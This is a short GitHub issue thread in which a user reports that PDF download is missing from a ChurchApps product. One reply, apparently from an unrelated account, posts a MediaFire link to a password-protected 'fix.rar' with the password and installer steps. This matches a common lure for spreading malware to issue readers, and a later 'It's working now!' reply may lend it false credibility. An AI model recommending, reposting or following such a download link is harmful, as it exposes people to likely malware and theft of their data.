### ISSUE TITLE
Download function for PDF not working

### ISSUE THREAD

**Issue by tbyrd77** [ChurchApps/ChurchAppsSupport#359]
The download for video seems to work fine but the PDF download doesn't work.  The PDF download does not show up as an option.

<img width="1241" alt="Screenshot 2024-08-27 at 10 03 40 AM" src="https://github.com/user-attachments/assets/2777bc75-e1cc-4a4e-9307-73b0e1f7d097">
<img width="1229" alt="Screenshot 2024-08-27 at 10 03 57 AM" src="https://github.com/user-attachments/assets/3d4907cd-cc34-48f1-a876-c27acb4306dc">

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Himali-Malvawala** [comment]
It's working now!
